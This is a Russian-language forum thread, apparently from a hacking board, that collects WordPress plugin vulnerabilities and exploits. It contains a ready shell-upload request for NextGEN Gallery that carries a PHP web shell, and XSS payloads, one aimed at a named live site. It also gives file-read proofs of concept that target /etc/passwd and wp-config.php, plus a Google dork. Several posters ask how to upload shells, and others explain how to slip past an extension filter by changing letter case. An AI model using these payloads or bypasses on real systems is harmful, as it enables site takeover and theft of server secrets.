[ Обзор уязвимостей WordPress ]

разве там нет anti-csrf хеша ?

 

https://wpvulndb.com/
ежедневное обновление уязвимостей вп

 

https://github.com/dionach/CMSmap
CMSmap сканер уязвимостей для популярных CMS WordPress, Joomla, Drupal.
По сути,аналог WPScan , только можно использовать на Windows + поддержка веб-шелла.

 

https://github.com/joren485/WP-Slimstat-SQLI
скрипт для эксплутации бага WP-Slimstat
http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html

https://github.com/delvelabs/vane GPL форк известного сканера WPScan

 

MAC PHOTO GALLERY v. 2.7

MAC PHOTO GALLERY
dork: inurllugins/mac-dock-gallery/ download
@version:2.7

Уязвимый код:

PHP:

$file = dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];
header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);

POC:

PATCH:
https://wordpress.org/plugins/mac-dock-gallery/other_notes/

 

Sorry for my English
does any body know how to use the latest revslider exploit
to upload shell

Reference: https://wpvulndb.com/vulnerabilities/7540
Reference: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
Reference: http://marketblog.envato.com/general/affected-themes/
Reference: http://packetstormsecurity.com/files/129761/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1579
Reference: http://osvdb.org/109645
Reference: http://www.exploit-db.com/exploits/34511/
Reference: http://www.exploit-db.com/exploits/35385/
Reference: http://www.exploit-db.com/exploits/36039/


Thanks

 

WordPress 4.2 stored XSS

 

WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability

Code:

WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM
Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data;
boundary=---------------------------2427186578189
Cookie:
X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42;
wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------2427186578189
Content-Disposition: form-data; name="name"
cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>
The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
        #  1337day.com  #

Подскажите пожалуйста как этим чудом пользоваться?

 

нужно отправить POST запрос, где при отправке подменить расширение с jpg на php
шелл будет по адресу /wp-content/gallery/folder_name/shell.php

 

Ну и xss там же

Code:

http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1"><img src=x onerror=alert(1)//">&limit=42

 

Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions: 4.2.1 and probably below

Proof of Concept URL for DOM XSS in WordPress:

Code:

http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#<img/src/onerror=alert(123)>

Source: http://seclists.org/bugtraq/2015/May/56

 

А разве для этого не нужны админ права?

 

В паблике была опубликована такая бага:
https://www.exploit-db.com/exploits/37166/ - WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload
При анализирование баги и студии которая выпустила уязвимый компонент, были обнаружены также дополнительно уязвимые компоненты, темы и отдельные скрипты с этим уязвимым файлом.

вот их продукция что попала мне с этим уязвимым файлом:

сам уязвимый код:

PHP:

<?php

/*
* DZS Upload
* version: 1.0
* author: digitalzoomstudio
* website: http://digitalzoomstudio.net
*
* Dual licensed under the MIT and GPL licenses:
*   http://www.opensource.org/licenses/mit-license.php
*   http://www.gnu.org/licenses/gpl.html
*/

$disallowed_filetypes = array('.php', '.exe', '.htaccess', '.asp', '.py', '.jsp', '.pl'); // эта строчка взависимости от продукта, меняет набор расширений
$upload_dir = dirname(__FILE__) . '/upload';

function get_theheaders() {
    //$headers = array();
    //print_r($_SERVER);
    return $_SERVER;
}

//print_r($_POST); print_r($HTTP_POST_FILES); print_r($_FILES);

if (isset($_FILES['file_field']['tmp_name'])) {
    $file_name = $_FILES['file_field']['name'];
    $file_name = str_replace(" ", "_", $file_name); // strip spaces
    $path = $upload_dir . "/" . $file_name;
    //print_r($HTTP_POST_FILES);
    //==== checking for disallowed file types
    $sw = false;

    foreach ($disallowed_filetypes as $dft) {
        $pos = strpos($file_name, $dft);
        if ($pos !== false) {
            $sw = true;
        }
    }

    if ($sw == true) {
        die('<div class="error">invalid extension - disallowed_filetypes</div><script>hideFeedbacksCall()</script>');
    }
    if (!is_writable($upload_dir)) {
        die('<div class="error">dir not writable - check permissions</div><script>hideFeedbacksCall()</script>');
    }




    if (copy($_FILES['file_field']['tmp_name'], $path)) {
        echo '<div class="success">file uploaded</div><script>top.hideFeedbacksCall();</script>';
    } else {
        echo '<div class="error">file could not be uploaded</div><script>window.hideFeedbacksCall()</script>';
    }
} else {
    $headers = get_theheaders();
    if (isset($headers['HTTP_X_FILE_NAME'])) {
        //print_r($headers);
        $file_name = $headers['HTTP_X_FILE_NAME'];
        $file_name = str_replace(" ", "_", $file_name); // strip spaces
        $target = $upload_dir . "/" . $file_name;


        //==== checking for disallowed file types
        $sw = false;

        foreach ($disallowed_filetypes as $dft) {
            $pos = strpos($file_name, $dft);
            if ($pos !== false) {
                $sw = true;
            }
        }

        if ($sw == true) {
            die('<div class="error">invalid extension - disallowed_filetypes</div>');
        }

        if (!is_writable($upload_dir)) {
            die('<div class="error">dir not writable - check permissions</div>');
        }


        //echo $target;
        $content = file_get_contents("php://input");

        if (file_put_contents($target, $content)) {
            echo 'success';
        } else {
            die('<div class="error">error at file_put_contents</div>');
        }
    } else {
        die('not for direct access');
    }
}

максимальная строчка с набором расширений на глаза попалась такая:
$disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm','.phtml','.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');

но кто поймет этот участок кода:

PHP:

foreach ($disallowed_filetypes as $dft) {
            $pos = strpos($file_name, $dft);
            if ($pos !== false) {
                $sw = true;
            }
        }

поймет что нам это не помеха ;-)

Пассивные XSS:

wp-content/plugins/dzs-videogallery/ajax.php?source="/><script>alert();</script>
wp-content/plugins/dzs-videogallery/ajax.php?type="/><script>alert();</script>

http://digitalzoomstudio.net/ - блог автора
http://codecanyon.net/user/ZoomIt/portfolio - портфолио продаж компонентов

P.S: Тэги для гугла)) dzs-videogallery exploit, dzs-zoomsounds exploit, dzs-calendar exploit, html5uploader exploit, php_ygallery exploit, php_mediagallery exploit, custom_rapista exploit, themes/royale/ exploit

 

А как такое обходиться ?

 

смотрите в сторону функций http://php.net/manual/ru/function.strpos.php и http://php.net/manual/ru/function.stripos.php

 

я тоже не совсем понял, можно просто регистр в расширении другой поставить и тогда такой файл пройдет?

 

да, пройдет

 

WP 3D Twitter Wall

Code:

# Vendor: https://wordpress.org/plugins/3d-twitter-wall/
#/wp-content/plugins/3d-twitter-wall/proxy.php

$url = ($_POST['url']) ? $_POST['url'] : $_GET['url'];
...
$session = curl_init($url);    // $url = $_GET['url'] OR $_POST['url']
...
$response = curl_exec($session);
echo $response;
curl_close($session);

POC: _http://example.com/plugins/3d-twitter-wall/proxy.php?url=file:///etc/passwd

 

WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]

Code:

# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5  [Arbitrary file download vulnerability]
# Date: 2015-07-10
# Google Dork:
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
# Version: 1.0.5
# Tested on: windows 7 + firefox.

====================
DESCRIPTION
====================

A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
The vulnerability allows remote attackers to download arbitrary files from the server.
The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.

The web vulnerability can be exploited by remote attackers without privileged application user account
and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
in application compromise.

==============
POC
==============

   # http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&[email protected]&f=../../../../wp-config.php HTTP/1.1
  
   the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.

  
==================
VULNERABLE CODE
==================

Located in cp-image-store.php

function cpis_download_file(){
    ...
       
    if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
        header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
        header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
        if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
            readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
        }else{
            @unlink( CPIS_DOWNLOAD.'/.htaccess');
            header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
        }
    ...
}